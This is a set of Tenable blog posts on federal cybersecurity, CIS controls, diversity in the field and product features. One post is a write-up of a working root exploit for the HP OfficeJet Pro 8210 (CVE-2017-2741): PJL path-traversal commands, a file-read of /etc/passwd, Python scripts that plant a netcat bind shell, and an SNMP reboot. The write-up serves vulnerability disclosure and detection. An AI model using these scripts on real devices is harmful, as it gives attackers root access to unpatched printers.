The White House called for a 30-day sprint in response to the devastating data breach at the Office of Personnel Management (OPM), discovered in April 2015. The immediate goal was to bring agencies’ cybersecurity up to an acceptable level. It directed agencies to implement a number of best practices, including scanning systems for known threats, patching critical vulnerabilities, managing privileged access and using multi-factor authentication. But is a sprint enough?

Two years after the breach, which exposed sensitive records and personal information of 21.5 million past, present and potential federal employees, the OPM Inspector General still found the agency was struggling to meet cybersecurity requirements. OPM is not the only agency facing these challenges. The Government Accountability Office has classified federal cybersecurity as a high-risk program for 20 years.

To address today’s cybersecurity challenges, the government needs a marathon

A sprint is fine if you need to quickly meet a short-term goal, but that’s not how the government or the world should be thinking about risk or security. To address today’s cybersecurity challenges head on, the government needs a marathon. Without a resilient and comprehensive cybersecurity strategy, agencies will struggle to understand their true level of exposure and to reduce their risk.

The changing world

The federal government is frequently criticized for maintaining legacy IT systems. The House Oversight Committee last year called agencies’ reliance on outdated and unsupported technology “a ticking time bomb.” Alongside these legacy systems, agencies are adopting new computing assets like cloud, DevOps/containers and the Internet of Things (IoT) that are disrupting the traditional network perimeter to create a dynamic and boundaryless IT environment.

Alongside legacy systems, agencies are adopting new computing assets

Operational technologies (OT) like SCADA/ICS are still a major part of the government’s critical infrastructure, and while designed for precision and reliability, were not built with security in mind. The rise of industrial IoT means critical devices such as medical devices, transportation systems and ICS have become internet accessible.

This convergence of IT and OT is expanding the already complex attack surface, creating additional security risks and safety concerns for chief information security officers (CISOs) who already struggle to gain visibility into their exposure areas.

Real modernization

Real modernization requires change in how systems are architected

Agencies must modernize IT systems if they are to improve their cybersecurity. But modernization requires more than merely updating or replacing legacy systems with new products and services. Real modernization requires change in how systems are architected. The systems must provide administrators with the visibility to fully monitor all assets—whether on-premises or in the cloud—in as close to real time as possible. Administrators must be able to manage them and to respond quickly to vulnerabilities, threats and attacks. This requires interoperability and the use of automation where possible, so that administrators and security personnel can apply their human intelligence where it is most needed.

Modernization will be a big job for agencies. The GAO reported to the House Oversight Committee last year that agencies spent more than 75 percent of their fiscal 2015 IT budgets on legacy equipment. Some systems still are using COBOL (the Common Business Oriented Language) for computers developed in the late 1950s and early 1960s.

Replacing these antiquated systems would be a step forward in improving cybersecurity. But completing the task of modernization will require a long-term commitment to change and will be realized only if it is prioritized by agencies, legislators and the administration. Initiatives such as President Trump’s recent Executive Order on cybersecurity can help point the way to needed changes and strategic planning. The Modernizing Government Technology bill that has been introduced in Congress would help by establishing a capital fund to help agencies finance new technology. This could jumpstart the modernization process and make it easier for agencies to make long-term plans and to respond quickly to evolving threats and technology.

Ultimately, each agency must establish and pursue its own strategic plans focusing on the long-term goal of manageable and secure information systems. Only then can the government be fully prepared to regain control of their networks and confidently manage cyber risk in today’s modern IT landscape.

More information

For more data about the OPM situation, visit the Tenable OPM web page and download the free whitepaper.

According to a survey conducted by Tenable in late 2016, only 50% of our customers use our configuration auditing capabilities. That’s the bad news. The good news is that those who do use it really like it. But back to the bad news; Tenable and the Center for Internet Security sponsored a separate research project that found that only 55% of organizations enforce secure configuration standards for laptops, workstations and servers. That leaves a lot of systems with potentially unnecessarily open ports and services, weak or default passwords, overly broad user rights and other configuration weaknesses.

If you’ve read my recent blog posts, you understand the importance of having only authorized devices and software on your network. The next step, according to the CIS Critical Security Controls, is to securely configure (harden) the authorized hardware and software of your mobile devices, laptops, workstations and servers. The CIS is not alone in this recommendation – other security frameworks and compliance standards echo the importance of securely configuring your systems as well.

Even if you follow strict configuration management and provision secure “golden” images, you should still audit configurations frequently to identify the inevitable configuration drift that occurs as configurations are manually modified. Additionally, you should securely configure the entire stack, not just the operating system – especially for internet-facing servers. Don’t ignore virtualization, cloud infrastructure, container platforms, containers, web servers and database servers. Like the proverbial chain, security is only as strong as the weakest layer of the stack.

Configure the entire stack, not just the operating system

You can get started with configuration standards available from multiple sources. The CIS publishes more than three dozen Benchmarks, DISA publishes a number of Security Technical Implementation Guides (STIGs), and many vendors publish their own guidelines. You may need to tailor the standards to your organization’s specific requirements. The key is to get started!

Tenable can help

Tenable offers more than 300 configuration audit files that cover multiple versions of popular operating systems, cloud infrastructure, web servers, databases, Windows productivity apps and network devices. Additionally, SecurityCenter® 5 is fully certified against Security Content Automation Protocol (SCAP) 1.2. SCAP, a methodology used to evaluate vulnerability management, measurement and policy compliance of security software solutions, is recommended by CIS to streamline reporting and integration. It is also meets NIST and FISMA reporting requirements.

SecurityCenter offers three reporting mechanisms to address a range of requirements. Each can be scoped for specific business systems to focus results:

• Reports by asset type list setting-by-setting and system-by-system audit results and identify settings requiring remediation.

• Dashboards display compliance status, allowing users to drill into details as needed (see example below).

• Assurance Report Cards (ARCs) communicate a compliance status overview that can be communicated to business owners and non-technical stakeholders (see example below).

Learn more

The CIS Critical Security Controls include seven sub-controls that support Secure Configurations for Hardware and Software. A detailed discussion of these sub-controls is beyond the scope of this blog – but we can help you learn more. Tenable is hosting a webinar on June 21st when we will dive into the control details, show you how Tenable can help and answer your questions. This webinar is the third of a five-part series that will explore each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course, Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course, Implementing and Auditing the Critical Security Controls – in Depth. In addition to presenting valuable content, we will reserve time for questions and answers.

Look for future blogs where I will discuss the remaining Foundational Cyber Hygiene controls:

• Continuous vulnerability assessment and remediation
• Controlled use of administrative privileges

I’ve been in IT for the last 16 years, nearly two of which have been in cybersecurity. I was recently given public platforms to discuss my views on diversity in the industry. The crazy part is how close I came to never actually having a career in tech.

The first opportunity came following my recognition as Minority Practitioner of the Year by the International Consortium of Minority Cybersecurity Professionals (ICMCP). And most recently, I joined over 100 women at the Executive Women’s Forum (EWF) Cybersecurity Women on Capitol Hill.

The day-long EWF event was a chance to meet dozens of women in both the private and public sector leading the way in cybersecurity. The night ended with a speech from Tenable CEO Amit Yoran, where he discussed his commitment to improving diversity through public and private sector partnership.

More than anything, these opportunities lit a fire under me and motivated me to learn more, stay active in the field and engage with other women in cybersecurity.

Women form only 11 percent of the global cybersecurity workforce

But taking a step back, I realize just how close I was to never stepping foot in the tech industry. Funny enough, my career in IT was coincidental. It all started while I was an executive assistant for an IT director. Although I didn’t actively pursue a position in IT, I was recognized for my tech savviness, and was given the opportunity to join the end-user support team.

Since then, I’ve gone from helpdesk support to customer support, to working on a full scale security team. Seven of my last years in IT have been at Tenable, where I’ve seen the company grow from a 100-person startup, to a global cybersecurity leader.

I’ve often wondered how different my career path and life would have been if I hadn’t been noticed by that manager. Would I have eventually found my way to tech? Or would I have been too timid to step outside of my comfort zone and pursue my dream?

A lack of early exposure to STEM programs, mentorship and inclusive company cultures have created hurdles for women

Unfortunately, my situation isn’t unique. A lack of early exposure to science, technology, engineering and math (STEM) programs, mentorship and inclusive company cultures have created hurdles for women to join the cybersecurity industry – hurdles that have resulted in women forming only 11 percent of the global cybersecurity workforce, according to a study done by EWF.

While increased awareness of this problem has helped to close the diversity gap, we need to do more to ensure women and minorities entering cybersecurity isn’t by chance.

Early exposure

Exposure to new ideas, thoughts and opportunities is what enables us to grow. That’s why access to and encouragement of STEM education is so important. Without early childhood exposure to math, science and technology, girls can quickly become hesitant and discouraged from exploring these fields.

Growing up, I was never exposed to technology in school. But unlike many years ago, advancements have brought computers and mobile devices to virtually every classroom — an opportunity we need to jump on. While there is currently strong momentum around STEM, we need to continue to bring well-funded programs to every school, and ensure that young girls and minorities are encouraged and motivated to pursue the field.

Mentorship

One of the key factors to a long and successful career in tech is strong mentorship. But women who enter the cybersecurity workforce are often left without mentors to help them navigate a male-dominated industry.

One of the key factors to a long and successful career in tech is strong mentorship

It’s no secret that women have long been overlooked by customers, colleagues and even managers, simply because of our gender. This is something most, if not all, women experience in IT and elsewhere. And it’s one more reason why promoting female leadership and mentorship is so important.

Company culture

You often spend more time at work than you do at home, which is why company culture is critical to success. I’ve been lucky enough to spend my work hours at Tenable, a company that is committed to its employees, ensuring that everyone’s voice is heard.

Although the industry has leaps and bounds to make when it comes to diversity, we can start by fostering an inclusive company culture where diversity of thought and approach is celebrated and embraced.

The road ahead

There’s no doubt that the industry has a long road ahead when it comes to closing the diversity gap. But I’m confident that we’re moving in the right direction. Change won’t happen overnight, but we need to stay focused on the areas that matter most: encouraging young girls to pursue STEM, mentoring the next generation of women in cybersecurity and developing inclusive work cultures that promote creativity and diversity.

Continued support and collaboration of industry and government leaders, such as those at the EWF Cybersecurity Women on Capitol Hill event, is critical to tackling this issue.

This blog originally appeared on LinkedIn.

Credentialed scanning is a key aspect of any vulnerability management program, but how can you be sure the scans are successful? Changes to infrastructure or specific hosts could result in the wrong credentials being used to elevate privileges during scans. If this happens, your scans could fail to gather the vulnerability data essential to effectively implementing your vulnerability management plan. The Tenable.io™ Elevated Privilege Failures report can give you detailed insight into the *nix hosts in your network that may not be getting scanned as thoroughly as believed.

Privilege escalation in credentialed scans

Configuring a non-root account on all scan targets is recommended when running credentialed scans

When SSH is used for credentialed scanning, you have the option of specifying an account to use for privilege elevation. This feature lets you use a non-root account for the scan to log in via SSH. The scan will then escalate privileges with the configured root account to gather data that is not available to non-root users. The method of separately logging in and elevating privileges keeps root credentials off the wire, thereby being more secure. Therefore, configuring a non-root account on all scan targets is recommended when running credentialed scans.

The Tenable.io solution

Tenable.io can efficiently identify hosts where privilege escalation in credentialed scans has failed. The Elevated Privilege Failures report provides detailed information on these hosts.

The Elevated Privilege Failures report provides you with comprehensive and detailed lists of the hosts on your network that may not be getting scanned thoroughly. This information is broken down by operating system and host. The Elevated privilege failure summary by Operating System pie chart shows privilege escalation failures by operating system and could indicate whether recent configuration changes may have caused the failures to start happening. For example, you will be better able to track the source of failures if the root account password has been changed for a specific operating system but not network-wide.

The Systems with elevated privilege failures table lists which hosts’ failures have been detected based on the results of the Authenticated Check: OS Name and Installed Package Enumeration plugin (ID 12634). The table filters for plugin results that contain a phrase indicating that local privileges were not successfully elevated. This table also acts as an index for the next table, which provides more in-depth information about the hosts impacted.

The vulnerability details table lists results from plugin ID 12634, including the plugin output, for each host impacted. Details about the host, such as the IP and MAC addresses, are provided along with the plugin output that describes the attempt and failure to elevate the privileges of the scan account.

Regardless of your approach to credentialed vulnerability scanning with Tenable.io, ensuring proper credential configuration is the first step to gathering thorough scan results. Tenable.io provides information security professionals with the tools and resources needed to perform accurate and rigorous credentialed vulnerability scanning. The Elevated Privilege Failures report provides insight into potential failures impacting the accuracy of credentialed scanning. Armed with Tenable.io, you can be sure that your credentialed scans are able to gather all available data.

Ensuring proper credential configuration is the first step to gathering thorough scan results

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks and helps track improvements over time. Get a free trial of Tenable.io Vulnerability Management for 60 days.

Most of us are likely very familiar with vulnerability management. Unfortunately, familiarity with vulnerability management doesn’t necessarily equate to mastery. According to a survey sponsored by Tenable and the Center for Internet Security (CIS) in late 2016, about half of the surveyed organizations need to significantly improve their vulnerability management practice. The following data tell the story:

• Only 56% use automated tools to perform any type of vulnerability scanning.
• Only 51% use automated tools to scan all network systems for vulnerabilities on at least a weekly basis.
• Only 36% verify that important vulnerabilities with available patches were addressed within two weeks.

The fourth of the five CIS Controls (CSC), Continuous Vulnerability Assessment and Remediation, is described as:

continuously acquiring, assessing and taking action on new information in order to identify vulnerabilities, remediate and minimize the window of opportunity for hackers.

CSC 4 includes eight sub-controls that will help you improve your vulnerability management program. Here is an overview of several sub-controls.

Run automated vulnerability scans against all systems at least weekly and deliver a prioritized vulnerability list to system administrators (see CIS Control 4.1). As the above survey data shows, only about half of organizations scan all systems weekly. If yours is not yet scanning weekly, it may be relatively easy for your security team to begin scanning more frequently. However, if you don’t significantly pare down your list of vulnerabilities to those that are most important, you can easily bury your IT operations colleagues and deter them from taking action on your vulnerability reports. As an example, you can pare down your list by including only critical and high vulnerabilities that have an exploit available.

Perform vulnerability scanning in authenticated mode or with agents (see CIS Control 4.3). External, non-authenticated scanning only provides a surface picture. You need to assess your systems from the inside out to identify OS and application/service vulnerabilities.

Subscribe to vulnerability intelligence services (see CIS Control 4.4). First, you need to ensure that your vulnerability scanning tool is regularly updated with all relevant important vulnerabilities. Second, if one is available, you should join an industry-specific threat intelligence service to identify the threats that target organizations like yours. This intelligence should help you identify vulnerabilities that require prompt remediation.

Deploy automated patch management tools (see CIS Control 4.5). Realistically, automation is the only way to remediate the majority of high-priority vulnerabilities. This certainly applies to servers and desktops running popular operating systems and popular applications. You may need to apply manual patches or implement compensating controls for some systems, but this should be the exception.

Verify that vulnerabilities were addressed (see CIS Control 4.7). It is not enough to throw a prioritized vulnerability list over the wall to your operations colleagues. You need to work with them to measure the results using a closed-loop vulnerability management process. Jointly develop reasonable goals to establish some quick wins and measure progress over time as you continuously improve.

Establish a process to risk-rate vulnerabilities (see CIS Control 4.8). This sub-control is an expansion of CSC 4.1, which includes basic prioritization. Here, the recommendation is to incorporate risk-based prioritization with the addition of knowledge about the assets you need to protect. Identify the assets with the lowest risk tolerance and remediate those first. You may also want to scan these assets more frequently.

Familiarity with vulnerability management doesn’t necessarily equate to mastery

Tenable can help

It should not be surprising that Tenable knows vulnerability management. However, you may not know that we have tailored a SecurityCenter Continuous View® dashboard and an Assurance Report Card® specifically for CIS Control 4. Both are templates that you can readily adapt to your specific requirements.

The CIS Vulnerability Management dashboard provides a clear picture of your vulnerability management status

The Track Mitigation Progress component in the upper left of the CIS CSC: Vulnerability Management (CSC 4) dashboard is especially useful. You can scope it to specific assets to track the mitigation status of the top exploitable hosts based on vulnerability criticality, exploitability and how long a patch has been available.

You can use the CIS CSC Vulnerability Management Assurance Report Card during monthly meetings with IT operations staff to jointly manage a closed-loop vulnerability management process. As your program matures, you can increase the thresholds to drive additional improvement.

The CIS CSC: Vulnerability Management ARC helps you communicate status to IT leadership

Learn more

During an upcoming Tenable webinar on June 28, Brian Ventura, a SANS Community Instructor, will dive into the details of each of the sub-controls and show you how Tenable supports CIS Control 4. We will also reserve time for questions and answers.

Even if you can’t attend, please register so we can send you a link to the recorded webinar to watch at your convenience.

Watch for my final blog in this series on Foundational Cyber Hygiene controls; CIS Control 5 is all about controlled use of administrative privileges.

Printers. They are everywhere. In big businesses. In small businesses. In our homes. In our schools. Wherever you go, there they are. But where are they in your threat model? When was the last time you updated the firmware? Do you know if there are public exploits for your printer?

For example, in early April, Hewlett Packard released a security bulletin titled, HP PageWide Printers, HP OfficeJet Pro Printers, Arbitrary Code Execution. The bulletin states:

A potential security vulnerability has been identified with certain HP printers. This vulnerability could potentially be exploited to execute arbitrary code.

That’s not an especially useful summary since most customers will stop reading at “potential.” Even more useless is the description of the assigned CVE (2017-2741). At the time of writing, over two months after the HP security bulletin, the CVE lacks any type of description because it remains in the “RESERVED” state.

Ever curious, the Tenable reverse engineers were intrigued by this “potential” security vulnerability that was given a CVSSv2 score of 9.8. Always willing to indulge our curiosity, we purchased a couple of printers listed in the advisory (HP OfficeJet Pro 8210).

A new type of printer stack

Purchasing new hardware and hoping the vulnerable firmware is still installed is always a gamble. Who knows how much work it will require to undo the patching? Fortunately, both printers arrived with vulnerable firmware installed and updates disabled.

Firmware details in the web interface

One of the many frustrating things about Hewlett Packard’s security bulletin is that it tells the reader to download the firmware update from www.hp.com/support. Good luck with that though; the OfficeJet Pro 8210’s firmware isn’t available for download. However, using the Install updates automatically and Check now features on the printer’s web interface, we were able to update a printer to a patched firmware.

At this point, we had both a patched and an unpatched printer. Time to start digging for remote code execution.

We started with an Nmap scan to find the open printer’s ports:

albinolobster@ubuntu:~$ nmap -A 192.168.1.159

Starting Nmap 7.01 ( https://nmap.org ) at 2017-06-08 10:31 PDT
Nmap scan report for HP0A6BFE.westeros (192.168.1.159)
Host is up (0.014s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
443/tcp   open  ssl/https  HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
515/tcp   open  printer
631/tcp   open  ssl/ipp    HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
8080/tcp  open  http-proxy HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
9100/tcp  open  jetdirect?

There’s nothing too surprising here. HTTP servers listening on ports 80, 443, and 8080. Line Printer Daemon (LPD) on port 515. Internet Printing Protocol (IPP) on port 631. Nmap flags port 9100 as “jetdirect?” which generally means “raw printing” or port 9100 printing.

HP refers to port 9100 printing as “HP proprietary,” but it’s widely known that it supports raw printing as well as PCL, PostScript, and PJL. Here’s a simple example of using PJL over port 9100 to get the printer’s device information:

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL INFO ID
@PJL INFO ID
"HP OfficeJet Pro 8210"

Jens Müller recently wrote a paper titled Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices that details common vulnerabilities in printers. One of the common vulnerabilities the author presents is path traversal via PJL. For example, consider the following PJL command for listing a directory on the printer:

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/" ENTR
tmp/ TYPE=DIR
csr_misc/ TYPE=DIR

You can see the directory name being listed is 0:/ and that the printer responds with two sub-directories: tmp/ and csr_misc/. What happens if you try to move up a couple of directories using the path 0:/../../?

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1
rw/ TYPE=DIR
ram/ TYPE=DIR
rom/ TYPE=DIR
.sig/ TYPE=DIR

As you can see, the printer responds with a new list of directories. It looks like we might have an attack vector here. Below, you can see that executing the same PJL command on the patched printer generates a FILEERROR. We know HP has fixed this between our two firmware versions. There is a good chance this could lead to the security bulletin’s remote code execution.

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../"
FILEERROR=0

However, this traversal doesn’t seem immediately useful. The file structure doesn’t look like any root filesystem the I’m familiar with. Perhaps there is another directory traversal vector?

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="../../" ENTRY=1 COUNT=4
@PJL FSDIRLIST NAME="../../"
FILEERROR=0

@PJL FSDIRLIST NAME="../../bin/" ENTRY=1 COUNT=4
@PJL FSDIRLIST NAME="../../bin/" ENTRY=1
getopt TYPE=FILE SIZE=880020
setarch TYPE=FILE SIZE=880020
dd TYPE=FILE SIZE=880020
cp TYPE=FILE SIZE=880020

Here, I tried ../../ but that generated a FILEERROR. However, ../../bin lists files that you’d find in a traditional Linux /bin directory. It appears you can traverse into the Linux filesystem.

But how can you turn these directory traversals into remote code execution? First, you need to know a few other PJL commands: FSQUERY, FSUPLOAD, and FSDOWNLOAD. These three commands will give you r/w access to the printer’s filesystems. For example, I can leverage FSQUERY and FSUPLOAD with the directory traversal to retrieve the contents of /etc/passwd:

@PJL FSUPLOAD NAME="../../etc/passwd" OFFSET=0 SIZE=648
@PJL FSUPLOAD FORMAT:BINARY NAME="../../etc/passwd" OFFSET=0 SIZE=648
root:x:0:0:root:/var/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
ftp:x:83:83:ftp:/home/ftp:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
default:x:1000:1000:Default non-root user:/home/default:/bin/sh
 _ntp:x:100:99:Linux User,,,:/run/ntp:/bin/false

Who cares about reading files though? I want to write them. FSDOWNLOAD requires sending the ESC character so instead of using Netcat I’ve written a Python script that tries to write to ../../tmp/writing_test:

import socket
import sys

test = ('test')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(test)) + ' NAME="../../tmp/writing_test"\r\n'
dir_query += test
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

Unfortunately, this script fails to write the file. It appears the process interpreting the PJL doesn’t have write access on the Linux filesystem:

albinolobster@ubuntu:~$ python write_test.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSQUERY NAME="../../tmp/writing_test"
@PJL FSQUERY NAME="../../tmp/writing_test"
FILEERROR=0

This is a big blow to our attempt to gain remote code execution. Without access to the Linux filesystem, the odds of replacing a binary or getting a Bash script executed are greatly diminished. At this point, our only hope is that the 0:/ filesystem is writable and that a file written there can get executed in some way.

I’ll spare you the boring details of combing through the 0:/ filesystem, but I eventually noticed that there was some overlap with the Linux filesystem. In particular, 0:/../../rw/var/etc/profile.d/ caught my eye because, traditionally, the profile.d directory contains scripts that get executed at startup. Furthermore, the directories appeared to contain the same data:

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="0:/../../rw/var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../rw/var/etc/profile.d/" ENTRY=1
.sig/ TYPE=DIR

@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1<
.sig/ TYPE=DIR

In order to test if I could write to profile.d via the 0:/ filesystem, I updated the FSDOWNLOAD Python script to write a file to 0:/../../rw/var/etc/profile.d/writing_test:

import socket
import sys

test = ('test')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(test)) + ' NAME="0:/../../rw/var/etc/profile.d/writing_test"\r\n
dir_query += test
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

As you can see below, the Python script now works! The new file is also visible via traversal of the Linux filesystem:

albinolobster@ubuntu:~$ python write_test.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1
.sig/ TYPE=DIR
writing_test TYPE=FILE SIZE=4

You now have write access to a location that likely contains startup scripts. You are so close to remote code execution. Now you just need to write a script and figure out how to reboot the printer so the script will get executed.

The obvious choice for our startup script is one that will give us shell access. Since the printer has netcat installed, I chose to to create a script that creates a bind shell on port 1270:

if [ ! -p /tmp/pwned ]; then
    mkfifo /tmp/pwned
    cat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &
fi

With that decided, our focus shifts to remotely rebooting the printer. One method would be using the Power Cycle function in the web interface (under the Tools menu). Another method is using the SNMP printer MIB to power cycle the device.

albinolobster@ubuntu:~$ snmpset -v1 -c public 192.168.1.158 1.3.6.1.2.1.43.5.1.1.3.1 i 4
iso.3.6.1.2.1.43.5.1.1.3.1 = INTEGER: 4

In the following script, I’ve combined writing the startup script to the profile.d directory and the SNMP reboot:

##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##

import socket
import sys
from easysnmp import snmp_set

profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
                    '\tmkfifo /tmp/pwned\n'
                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
                    'fi\n')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)

response = ''
while True:
    data = sock1.recv(1)
    if '\n' == data: break
    response += data

print response
snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
print 'Done! Try port 1270 in ~30 seconds'

You can run the script and, about thirty seconds later, have a root shell via port 1270.

albinolobster@ubuntu:~$ python printer_exploit.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh" TYPE=FILE SIZE=119
Done! Try port 1270 in ~30 seconds
albinolobster@ubuntu:~$ nc 192.168.1.158 1270
whoami
root

Tenable solutions

Fortunately for everyone, this little vulnerability is quite easy to detect once you understand the attack vector. Tenable released Nessus plugin 100461 in late May to detect this vulnerability. Also, changes were made so that Nessus no longer causes port 9100 to print during service discovery. Hopefully, that will encourage more customers to enable printer scanning.

To summarize, don’t overlook printers in your threat model. A printer is a computer and it should be treated like one. Scan it. Update it. Monitor it. Who knows what might lurk within?

Containers have transformed the way organizations are deploying applications and services within their environments. While containers are lightweight and more efficient alternatives to virtual machines, they usually exist for a short period of time. Rapid changes in agile environments can create significant risks for security teams using traditional vulnerability management solutions. Tenable.io™ Container Security provides you with an in-depth vulnerability assessment of container images, enabling you to evaluate the security of your containers before they are deployed.

Containers and DevOps

Containers provide DevOps teams with an easy way to build and deploy applications into a production environment. Images are often pulled directly from public repositories that contain stripped down versions of base operating systems and web applications and services. Just like traditional applications and services, containers may be outdated and hold vulnerabilities that can leave your systems at risk.

Container and security teams

For security teams, attempting to assess the security of containers can present a host of challenges when the containers are deployed as needed or hidden behind the Docker virtual networks. Containers take advantage of the Linux OS kernel by sharing host OS resources, enabling for quick delivery of applications that can be easily deployed, used, or removed within a short amount of time. Active scanning using credentials is often ineffective, as containers typically don’t include the SSH daemon to log in and scan the container. Some containers may have isolated applications and services that are not exposed publicly, making it difficult for security teams to assess an organization's overall risk profile.

Tenable.io Container Security

Using Tenable.io Container Security provides you with the visibility needed to see what’s going on inside your containers. Having accurate information enables developers to pinpoint and remediate container risks in a timely manner.

Getting started with Tenable.io Container Security is so easy that we are offering a free 60-day test drive.

Existing Tenable.io customers can activate their trial by logging into Tenable.io, and selecting Container Security from the Vulnerability Management toolbar.

Within the splash screen, click on Try Container Security to enable your 60-day free trial.

Once your trial has been activated, you will be redirected to the Tenable.io Container Security main page.

Pushing container images

You can easily push images to Tenable.io Container Security from any environment or platform within your network. To push images, start by logging in using your Tenable.io Container Security credentials from the host system.

$ docker login -u TENABLE_IO_CONTAINER_SECURITY_USERNAME -p TENABLE_IO_CONTAINER_SECURITY_PASSWORD registry.cloud.tenable.com

To get a complete list of your existing container images, enter the following:

$ docker images

Once you have identified the image you wish to upload, enter in the associated Docker Image ID, Repository name, Container image, and Tag. Note that using the tag switch is optional, and the system will use “latest” within the tag field by default.

$ docker tag <imageID> 
registry.cloud.tenable.com/<repository>/<image>:<tag>

Once tagged, you can push the container image up to registry.cloud.tenable.com.

$ docker push registry.cloud.tenable.com/<repository>/<image>:<tag>

To close out of your session, use the docker logout command to remove login credentials from the host:

$ docker logout registry.cloud.tenable.com

Dashboards

Dashboards provide management with complete visibility into your overall container security. Results include the number of images, vulnerabilities and malware discovered, enabling you to quickly determine which containers are at risk.

Repositories can be created manually or automatically pushed or pulled from an existing container registry. Tenable.io Container Security includes a repository index highlighting the number of images per repository, overall size, and the number of vulnerabilities or malware detected within that repository. You can easily drill down into any repository, image, or tag providing information on detected services, as well as vulnerabilities that may be present within the image.

Scan results for each container image include a list of when the image was last analyzed, overall risk score, and results in HTML, JSON and Nessus v2 file formats.

Layers

Tenable.io Container Security inventories and analyzes each layer within the container registry for vulnerabilities and malware. Scan results include information on the overall risk score, distribution of vulnerabilities by CVSS score, and a list of vulnerabilities by CVE. Use this information to help narrow down and remediate vulnerabilities before systems are deployed to production.

Policies

Tenable.io Container Security supports rules-based policy enforcement that helps you filter scan results and highlight specific vulnerability data relevant to your organization. Policies can be applied globally or to specific repositories that can highlight specific CVEs, CVSS values, or whether malware has been detected.

After adding rules that meet your organization's application security policies, you can organize the way rules are evaluated via drag and drop.

Scan results

Results include an overall risk score and information about the container image, including the base operating system (OS) and version. For teams that want to scan for changes between development and production environments, results also include a unique SHA256 checksum for each individual image pushed to Tenable.io Container Security. Using the Tenable.io Container Security Risk Scoring Framework, vulnerabilities are measured to help you determine the risk to your environment.

Each container layer and associated checksum is included within the scan results, along with an inventory of packages within the container image. Results include detected CVE, CVSS base score, description of the vulnerability, and remediation details.

